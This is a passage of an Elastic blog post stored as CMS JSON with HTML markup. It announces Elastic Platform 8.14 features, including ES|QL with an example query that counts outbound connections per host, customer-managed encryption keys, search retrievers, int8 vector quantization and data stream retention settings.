12pt;'\u003eElastic Platform 8.14 delivers the general availability (GA) of Elasticsearch Query Language (ES|QL) — the future of data exploration and manipulation in Elastic. It also includes the GA release of several other new features: Logstash on ECK, API key-based security model for remote clusters, AIOps log pattern analysis, built-in data stream lifecycle settings for retention and downsampling, dashboard links panels, and more. Also with 8.14, the Elastic Cloud platform makes encryption of data and snapshots at rest using customer-managed keys from AWS Key Management Service (AWS KMS) generally available.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOn the relevance ranking front, Elasticsearch 8.14 introduces optimizations to vector search for improved performance, makes scalar quantization of vectors the default option, and introduces the concept of retrievers to simplify queries and allow more flexibility in query construction.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese new features allow customers to:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCompose powerful queries to expose data insights in new ways\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAchieve regulatory compliance and enhanced security with encryption at rest using their AWS KMS keys\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEasily manage retention and downsampling for time series data using data streams\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatically manage Logstash pods in Kubernetes\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFind patterns in unstructured log messages to quicken RCA and reduce MTTR\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic 8.14 is \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?elektra=whats-new-elastic-7-13-blog\"\u003e\u003cspan style='font-size: 12pt;'\u003eavailable now on Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — the only hosted Elasticsearch offering to include all of the new features in this latest release. You can also \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads/\"\u003e\u003cspan style='font-size: 12pt;'\u003edownload the Elastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and our cloud orchestration products — Elastic Cloud Enterprise and Elastic Cloud for Kubernetes — for a self-managed experience.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic’s piped query language, ES|QL, is now generally available","_metadata":{"uid":"csdf45bbbcf1120c93"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eES|QL offers a streamlined way to filter, transform, and analyze data in Elasticsearch. Its intuitive design, utilizing \"pipes\" (|) for step-by-step data exploration, enables you to easily compose powerful queries for detailed analysis.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhether you're a developer, SRE, or security analyst, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/esql-piped-query-language-goes-ga\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eES|QL empowers you\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to uncover specific events, perform robust statistical analyses, and create compelling visualizations. As we move from technical preview to general availability, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/esql-elasticsearch-piped-query-language\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ediscover the enhanced capabilities of ES|QL\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and elevate your data operations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eES|QL enables complex multi-step analysis to be performed all in one query. This could be things that would have taken huge search queries before, or might not have even been possible in a search.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor example, this query identifies hosts that have the highest number of outbound connections:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbd777e1382ad5901"}}},{"code":{"code":"FROM logs-*\n| WHERE NOT CIDR_MATCH(destination.ip, \"10.0.0.0/8\", \"172.16.0.0/12\", \"192.168.0.0/16\")\n| STATS destcount = COUNT(destination.ip) BY user.name, host.name\n| ENRICH ldap_lookup_new ON user.name\n| WHERE group.name IS NOT NULL\n| EVAL follow_up = CASE(destcount \u003e= 100, \"true\",\"false\")\n| SORT destcount DESC\n| KEEP destcount, host.name, user.name, group.name, follow_up","_metadata":{"uid":"cs3ab53f6c855a90e7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2c29b577284befaa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNote how this query includes not only filters and aggregations, but a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-functions-operators.html#esql-case\"\u003e\u003cspan style='font-size: 12pt;'\u003eCASE\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e statement and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-enrich-data.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eenriching\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e based on a lookup into an enrich policy - previously only possible within ingest pipelines.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWant more ES|QL?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eIf you don’t have your own environment you can also try ES|QL with some sample data instantly in our \u003c/span\u003e\u003ca href=\"http://esql.demo.elastic.co\"\u003e\u003cspan style='font-size: 12pt;'\u003eES|QL Demo environment\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eHead over to Search Labs for a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/esql-piped-query-language-goes-ga\"\u003e\u003cspan style='font-size: 12pt;'\u003ecomprehensive overview of E|QL features and future plans\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Encrypt data and snapshots at rest with customer-managed keys","_metadata":{"uid":"cs9d27b4c096b607c6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eElastic Cloud now supports \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-encrypt-with-cmek.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eintegration with AWS KMS\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e, enabling the use of customer-managed keys for \u003c/span\u003e\u003ca href=\"http://www.elastic.co/blog/encryption-at-rest-elastic-cloud-enterprise-security\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eencrypting deployment data and snapshots at rest\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e. With this feature, customers can:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eLeverage filesystem-level encryption for deployment data at rest using their own AWS KMS keys.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eEmploy the AWS-native mechanism for snapshot encryption in S3.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eRotate their keys used in Elastic Cloud, providing an additional security measure to prevent key compromise. This can be done manually directly from AWS KMS or automatically from Elastic Cloud.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eRevoke their keys used in Elastic Cloud, serving as a break-glass operation in case of emergency with the ability to revert the action. This can be done directly from AWS KMS.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eThis addition expands the existing encryption at rest capability with Elastic-managed keys. The primary benefits of using customer-managed keys include regulatory compliance and reduction of risks associated with data storage.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Retrievers (standard, kNN, and RRF)","_metadata":{"uid":"cs46348b6d7ece6186"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/retriever.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRetrievers\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e are a new type of abstraction in the _search API that describes how to retrieve a set of top documents. Retrievers are designed to be nested in a tree structure so that any retriever can have child retrievers. Retrievers are a standard, more general and simpler API that replaces other various _search elements like kNN and query. In 8.14 we introduce support for three types of retrievers:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStandard — providing standard query functionality\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ekNN — enabling HNSW-based dense vector search\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/rrf.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRRF\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — merging various dense and sparse vector-ranking result set into a single blended and ranked result set using the reciprocal rank fusion algorithm\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere are two main benefits to the retrievers approach:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRetrievers are all structured in the same way, so they are easier to learn, write, and maintain.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBeing designed to be combined together in a tree structure provides more flexibility to design queries that could not be defined before — for example, not having kNN or RRF as a top-level element.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe introduction of retrievers is yet another step in our move to simplify the use of search in general and of vector search in particular. This theme includes enhancements like \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/pull/99445\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eautomatic vector normalization for a more performant cosine similarity\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and the introduction of RRF so that there is no need for tuning to achieve a high-quality blended set. We continue to invest heavily in that and plan to introduce relevance ranking through our new ES|QL language in the future.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1d7d02e2054df139"}}},{"image":{"image":{"uid":"blt6edf5ac4b2264ed6","_version":1,"title":"1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-05-30T18:01:25.533Z","updated_at":"2024-05-30T18:01:25.533Z","content_type":"image/png","file_size":"102143","filename":"1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-05T17:12:02.066Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6edf5ac4b2264ed6/6658bef528642a108c4373eb/1.png"},"_metadata":{"uid":"cse905c78a21bebe9c"},"caption_l10n":"","alt_text_l10n":"1 - code snippet","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6aa60e2e4df01a58"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSee \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/retro-relevance-balancing-keyword-semantic-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethis blog\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for additional examples for the use of RRF with retrievers.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Vector distance function optimized with SIMD (Neon) for int8 vectors","_metadata":{"uid":"cscff96ac0cef91c62"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch now uses native code for vector comparison using SIMD (Neon) for improved performance on ARM AArch64 architecture processors. The details of this enhancement are discussed in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/vector-similarity-computations-ludicrous-speed\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eVector Similarity Computations - ludicrous speed\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. The bottom line is that segment merging of int8 vectors has become several times faster than it was on these processors (typically 3\u003c/span\u003e\u003cspan style=\"color: rgb(33, 33, 33);font-size: 12pt;\"\u003e–\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e6 times faster). This improvement frees up resources for other tasks and speeds up the segment size optimization process.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis is yet another step in a series of vector similarity performance improvements. In the future, we intend to use this kind of optimization in other contexts, such as improving query latency.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Int8 quantization by default for dense vector fields","_metadata":{"uid":"cs261f80d03f02444f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMany models produce vectors with float32 elements. However, when examining real-life scenarios, it quickly becomes apparent that int8 elements provide a better compromise with a significantly smaller index (lower cost), improved ingest performance, and improved query latency. All of that is achieved with hardly any impact on ranking quality. The little impact that can sometimes be spotted in ranking quality metrics, such as NDCG or recall, can be easily mitigated by increasing the number of candidates that are being considered. But even without that, the change is typically not noticeable for end users, nor from a business perspective.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith that in mind, we \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-12-0\"\u003e\u003cspan style='font-size: 12pt;'\u003eintroduced scalar quantization to int8 in 8.12\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. After examining the production use of this functionality, we decided to make it the default behavior for new indices. Providing sensible defaults like that makes it easier for users that make their first steps toward vector search.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"General availability of Logstash on ECK","_metadata":{"uid":"cs0c52224b26c3b468"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLogstash on ECK is now the easiest way to install and manage Logstash deployments and offers seamless operation with the management of other Elastic Stack components. With just a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/logstash-eck-technical-preview\"\u003e\u003cspan style='font-size: 12pt;'\u003efew lines of code\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, users can deploy and configure Logstash pods on Kubernetes. Existing Logstash pipeline definitions just work when Logstash is deployed on ECK, making it easy for users to take advantage of the flexibility and scalability of Kubernetes. Logstash on ECK is available under Elastic’s Basic and Enterprise licenses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"API key-based security model for remote clusters is now GA","_metadata":{"uid":"csc9b5b9303f822041"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRemote cluster connections are the foundation of all \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/modules-cross-cluster-search.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCCS\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/xpack-ccr.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCCR\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e operations: they must ensure high-grade security while staying flexible and easy to use for users.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.14/remote-clusters-api-key.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAPI key-based security model\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, administrators can grant fine-grained access to their data and cover modern scenarios that don’t reflect the assumptions of the previous model.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn a modern world, remote clusters are often not fully trusted and administrators need to have full control over their data and who can access them.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe new security model introduces two key assumptions:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe trust relationship is unidirectional:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e If ClusterA configured ClusterB as its remote, ClusterB cannot automatically “call back” ClusterA.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRemote administrators are not trusted by design:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The remote cluster holding data can restrict access to just a given subset of its indices, and no one — including superusers on the other cluster — can access anything else.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe core of the authentication and authorization flow are cross-cluster API keys — a new dedicated type that is scoped for this specific task only. API keys can be created via Elasticsearch API or using Kibana, and they define CCS and CCR indices in the same way we’re used to. They can also be easily updated in case requirements change over time.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs52158ad2139fee2e"}}},{"image":{"image":{"uid":"blt3e4d7ab877dce33b","_version":1,"title":"2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-05-30T18:01:31.468Z","updated_at":"2024-05-30T18:01:31.468Z","content_type":"image/png","file_size":"181636","filename":"2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-05T17:12:02.012Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3e4d7ab877dce33b/6658befb73e8305c0b3145eb/2.png"},"_metadata":{"uid":"csa34f8abada762c79"},"caption_l10n":"","alt_text_l10n":"2 - create API key","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd2806bd2257bb821"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe API key-based security model \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eis now GA\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in Elasticsearch 8.14, and it can be used on Elastic Cloud, Elastic Cloud Enterprise, and standalone deployments. This is now our recommended option for all remote clusters that support it.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"AIOps log pattern analysis is generally available","_metadata":{"uid":"cs25c2552551312a07"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn 8.14, log pattern analysis becomes GA. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/run-pattern-analysis-discover.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eLog pattern analysis\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e enables faster and smarter investigation across thousands of log messages in order to analyze, troubleshoot, and identify the root cause of an incident. Combine it with anomaly detection and our other AIOps features to drastically reduce the MTTR.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7a3b3674f17d7c33"}}},{"image":{"image":{"uid":"bltfb0021e13d721764","_version":1,"title":"3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-05-30T18:01:36.992Z","updated_at":"2024-05-30T18:01:36.992Z","content_type":"image/png","file_size":"443893","filename":"3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-05T17:12:02.023Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb0021e13d721764/6658bf01bee7ba773abcde6d/3.png"},"_metadata":{"uid":"cs2984717dcd47b283"},"caption_l10n":"","alt_text_l10n":"3 - pattern analysis of message","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Data stream lifecycle settings now GA","_metadata":{"uid":"cs59cecf2ff6d9dd7a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn 8.11, we \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0#introducing-data-stream-lifecycle-(tech-preview)\"\u003e\u003cspan style='font-size: 12pt;'\u003eintroduced\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e new lifecycle settings built-in to data streams as an easy, new way to configure retention or downsampling without needing to use index lifecycle management (ILM). This new lifecycle capability in data streams also takes care of housekeeping for you, managing rollover and force merging automatically. And now it’s GA in 8.14.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt’s really easy to use. You can set the retention for a data stream in Kibana’s Index Management page under Data Streams:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5549af2476affbbe"}}},{"image":{"image":{"uid":"blt4665f5cd27fe5f17","_version":1,"title":"4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-05-30T18:01:43.406Z","updated_at":"2024-05-30T18:01:43.406Z","content_type":"image/png","file_size":"61956","filename":"4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-05T17:12:02.000Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4665f5cd27fe5f17/6658bf07e4a7321dee978e9f/4.png"},"_metadata":{"uid":"cs5ca2793065eb66f1"},"caption_l10n":"","alt_text_l10n":"4 - edit data retention","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa2cffa5689632c44"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eOr via the _data_stream API:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdf6ce7d8827c2677"}}},{"code":{"code":"PUT _data_stream/my-data-stream/_lifecycle \n{\n \"data_retention\": \"90d\"\n}","_metadata":{"uid":"csfff4ee987d82e442"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb98f8680787920ed"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/tutorial-manage-existing-data-stream.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eupdate an existing data stream\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to use these settings, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/tutorial-manage-new-data-stream.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ecreate a new data stream using this\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/tutorial-migrate-data-stream-from-ilm-to-dsl.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emigrate a data stream from ILM\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This is also being used automatically by some of the system indices like ilm-history and slm-history.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe lifecycle setting for data streams only works on data streams, not regular indices. It also doesn’t have any support for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-data-lifecycle-management-with-data-tiers\"\u003e\u003cspan style='font-size: 12pt;'\u003emoving data to different tiers\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — if you need that, stick with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for now.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat if you start using the lifecycle setting on a data stream for its ease, and then realize you need ILM instead for some advanced functionality like data tiers? We have you covered: data streams can be switched to and from ILM as needed. Just configure ILM, which takes precedence over any data stream lifecycle configuration.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Document comparison mode in Discover and ES|QL","_metadata":{"uid":"csc087f29fd8bca6c5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are enabling users to select and compare documents or fields. This functionality will be a game-changer for tasks like debugging, allowing you to perform detailed comparisons, such as diffing SIP messages of a certain ID across multiple documents in Elasticsearch. This will streamline your analysis and troubleshooting processes.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csec5d743e1527a50e"}}},{"video":{"vidyard_uuid":"vezKG4zqYrFccatCVnbCaE","_metadata":{"uid":"cs5f4becfea11ec774"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Links panel is GA","_metadata":{"uid":"cs4d532aacf18ae01b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can now easily navigate from one dashboard to another using the links panel. Organize your dashboards better and make them more performant by chunking them in multiple dashboards with fewer visualizations and linking them together. You can carry over your filters, query, and time range when navigating to other related dashboards. Display your links horizontally or vertically as it better suits your dashboard layout. You can also use the links panel to include external links in your dashboards like to your wiki page or other applications. And decide whether you want to open the links in the same browser tab or in a new one.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0c69d00f2aa67488"}}},{"video":{"vidyard_uuid":"WQSDeZazNFd27rHob7LTcf","_metadata":{"uid":"cs0f2eaa1ddca1d5de"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Region map goes GA","_metadata":{"uid":"cs90009686126e27cd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsers don’t need to navigate the complexity of the Elastic Maps app (meant to be used by more advanced geo users) to build a simple map. They can now do it easily from the Lens 